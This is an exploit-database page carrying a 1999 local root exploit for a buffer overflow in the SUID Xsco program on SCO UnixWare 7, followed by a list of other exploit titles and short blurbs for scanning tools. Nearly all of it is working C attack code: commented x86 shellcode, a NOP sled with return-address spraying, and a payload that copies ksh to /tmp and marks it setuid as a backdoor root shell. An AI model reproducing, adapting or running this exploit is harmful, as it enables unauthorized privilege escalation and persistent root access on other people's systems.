Menu

Search for hundreds of thousands of exploits

"SCO Unixware 7.0/7.0.1/7.1 - Xsco Buffer Overflow"

Author

Exploit author

K2

Platform

Exploit platform

sco

Release date

Exploit published date

1999-11-25

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
// source: https://www.securityfocus.com/bid/824/info

Under certain versions of Unixware, the SUID program Xsco is vulnerable to a buffer overflow attack. The problem lies in that Xsco does not sanity check user supplied data. 

// UnixWare7 /usr/X/bin/Xsco local, K2/cheez
//
// Xsco produces some strange side effect's with the execve; it seems
// that commands can not be run interactively.  Thanks to cheez for the
// shellcode.

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char shell[] =
/*   0 */ "\xeb\x5f"                         /* jmp springboard       */
/* syscall:                                                           */
/*   2 */ "\x9a\xff\xff\xff\xff\x07\xff"     /* lcall 0x7,0x0         */
/*   9 */ "\xc3"                             /* ret                   */
/* start:                                                             */
/*  10 */ "\x5e"                             /* popl %esi             */
/*  11 */ "\x31\xc0"                         /* xor %eax,%eax         */
/*  13 */ "\x89\x46\x9d"                     /* movl %eax,-0x63(%esi) */
/*  16 */ "\x88\x46\xa2"                     /* movb %al,-0x5e(%esi)  */
/* seteuid:                                                           */
/*  19 */ "\x31\xc0"                         /* xor %eax,%eax         */
/*  21 */ "\x50"                             /* pushl %eax            */
/*  22 */ "\xb0\x8d"                         /* movb $0x8d,%al        */
/*  24 */ "\xe8\xe5\xff\xff\xff"             /* call syscall          */
/*  29 */ "\x83\xc4\x04"                     /* addl $0x4,%esp        */
/* setuid:                                                            */
/*  32 */ "\x31\xc0"                         /* xor %eax,%eax         */
/*  34 */ "\x50"                             /* pushl %eax            */
/*  35 */ "\xb0\x17"                         /* movb $0x17,%al        */
/*  37 */ "\xe8\xd8\xff\xff\xff"             /* call syscall          */
/*  42 */ "\x83\xc4\x04"                     /* addl $0x4,%esp        */
/* execve:                                                            */
/*  45 */ "\x31\xc0"                         /* xor %eax,%eax         */
/*  47 */ "\x50"                             /* pushl %eax            */
/*  48 */ "\x56"                             /* pushl %esi            */
/*  49 */ "\x8b\x1e"                         /* movl (%esi),%ebx      */
/*  51 */ "\xf7\xdb"                         /* negl %ebx             */
/*  53 */ "\x89\xf7"                         /* movl %esi,%edi        */
/*  55 */ "\x83\xc7\x10"                     /* addl $0x10,%edi       */
/*  58 */ "\x57"                             /* pushl %edi            */
/*  59 */ "\x89\x3e"                         /* movl %edi,(%esi)      */
/*  61 */ "\x83\xc7\x08"                     /* addl $0x8,%edi        */
/*  64 */ "\x88\x47\xff"                     /* movb %al,-0x1(%edi)   */
/*  67 */ "\x89\x7e\x04"                     /* movl %edi,0x4(%esi)   */
/*  70 */ "\x83\xc7\x03"                     /* addl $0x3,%edi        */
/*  73 */ "\x88\x47\xff"                     /* movb %al,-0x1(%edi)   */
/*  76 */ "\x89\x7e\x08"                     /* movl %edi,0x8(%esi)   */
/*  79 */ "\x01\xdf"                         /* addl %ebx,%edi        */
/*  81 */ "\x88\x47\xff"                     /* movb %al,-0x1(%edi)   */
/*  84 */ "\x89\x46\x0c"                     /* movl %eax,0xc(%esi)   */
/*  87 */ "\xb0\x3b"                         /* movb $0x3b,%al        */
/*  89 */ "\xe8\xa4\xff\xff\xff"             /* call syscall          */
/*  94 */ "\x83\xc4\x0c"                     /* addl $0xc,%esp        */
/* springboard:                                                       */
/*  97 */ "\xe8\xa4\xff\xff\xff"             /* call start            */
/* data:                                                              */
/* 102 */ "\xff\xff\xff\xff"                 /* DATA                  */
/* 106 */ "\xff\xff\xff\xff"                 /* DATA                  */
/* 110 */ "\xff\xff\xff\xff"                 /* DATA                  */
/* 114 */ "\xff\xff\xff\xff"                 /* DATA                  */
/* 118 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA                  */
/* 126 */ "\x2d\x63\xff";                    /* DATA                  */

#define SIZE 600
#define NOPDEF 101
#define DEFOFF -240
#define LEN 102

const char x86_nop=0x90;
long nop=NOPDEF,esp;
long offset=DEFOFF;
char buffer[SIZE];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[]) {
    int i,len;
    char *cmd = "cp /bin/ksh /tmp;chmod 4555 /tmp/ksh";

    memset(buffer, x86_nop, SIZE);

    len = strlen(cmd); len++; len = -len;
    shell[LEN+0] = (len >>  0) & 0xff;
    shell[LEN+1] = (len >>  8) & 0xff;
    shell[LEN+2] = (len >> 16) & 0xff;
    shell[LEN+3] = (len >> 24) & 0xff;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);
    esp = get_esp();

    buffer[0]=':';
    memcpy(buffer+nop, shell, strlen(shell));
    memcpy(buffer+nop+strlen(shell), cmd,strlen(cmd));
    memcpy(buffer+nop+strlen(shell)+strlen(cmd),"\xff",1);
    for (i = nop+strlen(shell)+1+strlen(cmd); i < SIZE-4; i += 4) {
        *((int *) &buffer[i]) = esp+offset;
    }

    printf("jmp = [0x%x]\toffset = [%d]\tnop = [%d]\n",esp+offset,offset, nop);
    execl("/usr/X/bin/Xsco", "Xsco", buffer, NULL);

    printf("exec failed!\n");
    return 0;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.